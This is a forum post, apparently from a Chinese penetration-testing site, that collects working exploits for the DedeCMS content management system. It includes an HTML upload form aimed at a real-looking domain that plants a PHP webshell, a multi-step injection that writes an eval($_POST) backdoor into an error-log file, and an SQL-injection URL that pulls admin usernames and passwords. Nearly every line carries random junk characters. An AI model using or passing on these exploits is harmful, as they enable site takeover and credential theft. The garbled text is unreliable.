1 |( G* h9 L  z4 [5 i; j/ k
! J) E3 y9 e& t' f* G) g. m; [5 [  _$ C  G/ w; c! Y
5 q  ]+ y1 P- |  k3 j! X
4 ]- f! L0 O+ K. k
- L! j2 S& ]0 ~2 [# v- O! J
2 n! f/ P. ^" m. z3 m: _7 F! H: L2 `( y
# y6 @6 z& P2 {: }' K& I& P

$ r+ H8 f% @; k2 q  I; y织梦(Dedecms)select_soft_post.php页面变量未初始漏洞7 f! l, Q8 D) ?5 x# V: @9 Z
<html>; ~: {' L+ P1 z) [+ F  y3 x
<head>
/ |  S0 o% X  e: E4 a# A! G<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
, c0 ]5 x+ v) N+ V$ U' i0 I</head>
2 y+ s# O: z0 e/ m, @<body style="FONT-SIZE: 9pt">
" o0 ?/ D1 E/ V$ k+ f. A* g3 n/ h---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />, }) w8 J* d6 T+ r7 k
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
% X$ B+ F# L* \) ]9 G6 A. R4 A<input type='hidden' name='activepath' value='/data/cache/' />
$ W* K4 [. z, G7 }. x1 k1 S  H<input type='hidden' name='cfg_basedir' value='../../' />: i: N6 A; {  G; ~
<input type='hidden' name='cfg_imgtype' value='php' />6 c' k: H' E  c
<input type='hidden' name='cfg_not_allowall' value='txt' />
) m1 Y- i: g  l) K3 w. _# P<input type='hidden' name='cfg_softtype' value='php' />
( l' ]7 z  W0 i* ]<input type='hidden' name='cfg_mediatype' value='php' />) g, N! f: j; l2 E" E
<input type='hidden' name='f' value='form1.enclosure' />, i& h4 z5 `% k# p2 q- l8 a
<input type='hidden' name='job' value='upload' />; f. R" E* u: o, t, ?; L2 z
<input type='hidden' name='newname' value='fly.php' />& y* n; n; B% I$ ^: \- Y5 s
Select U Shell <input type='file' name='uploadfile' size='25' /># V2 k3 i3 l. `* I6 I) g& C  Z$ ?
<input type='submit' name='sb1' value='确定' />7 Y; m/ _' j1 w" J
</form># X2 j+ q. g2 x3 a( a# ^% q  h
<br />It's just a exp for the bug of Dedecms V55...<br />3 `, E/ k1 m0 _* @4 t( o
Need register_globals = on...<br />
$ z& P9 n0 b6 NFun the game,get a webshell at /data/cache/fly.php...<br />
+ t5 @2 x7 D. x& @! |</body>( @( C# S8 b1 l. _& n8 `
</html>
; e6 w% z( |% s) l: X: ^: M# ^! l3 D: y
  u6 L0 q7 y9 J7 A. z8 Z

, r7 ?- I0 p3 _, u8 k; W2 _+ d
4 N  g4 Q" ~8 h9 U2 a
8 K9 f& {' n5 o. X2 u( r, D
% D, G! `; M8 V- C6 F( T) [
8 |: v  K/ G  l( X1 o4 X! n( }' x% }6 }6 y, ~/ G' G$ t4 a5 n- K

3 g( L1 b- p7 g# S2 ^  X# Z7 q
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞0 x! O; c7 O+ L
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。6 y- Y; W: T3 N/ c. O8 G( O
1. 访问网址:* m# K3 p9 @: h: l) T
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>. K3 b$ m/ M8 c6 _  ]. n! f5 {
可看见错误信息
* k. y+ b3 l5 g. G; n6 k0 U6 [. l* C3 e, G" J) K4 k: F
; L% s5 m) o% D2 C! W* v/ n3 `
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。% Y" G9 i+ w8 x/ m/ A8 D4 D3 t3 v
int(3) Error: Illegal double '1024e1024' value found during parsing4 \( J2 N$ y' }: X: i3 i8 k
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>0 d9 d) E4 {: t

0 K6 W: Y+ U9 u  t* {$ Q+ R1 S
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是  B& R9 V3 X$ S, P7 s, s. d
- q! a+ ^$ J* J
/ K* `( ~7 I/ E: \
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>) J" d0 Q6 h  K

. G( a2 W+ Q) m2 V; b& _
  Q6 y  ~1 K# V- m* J9 c按确定后的看到第2步骤的信息表示文件木马上传成功.
" u! Q* s) |8 b/ A7 i/ Q4 U9 _; [3 I

9 J2 q4 x' s, w7 w- p' t
" o& W" |5 _$ c! N, X  C4 y1 k8 E4 ?  u+ M) z4 o8 T

# l+ X( S8 h5 N- H! O2 {
5 R3 i# @/ S8 l9 k  C8 I5 I. U- r6 Q8 d/ f
, [- V" }0 ~& Z' ~% V
" j$ X1 f; e9 e* I5 }
6 c' i# F+ B0 [8 E
+ o: {& ^* o. H2 Z; `2 {. @0 O

3 ]8 X3 O) ?. }8 k3 Y/ i* P织梦(DedeCms)plus/infosearch.php 文件注入漏洞* c+ n4 I; {1 P) g5 I
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2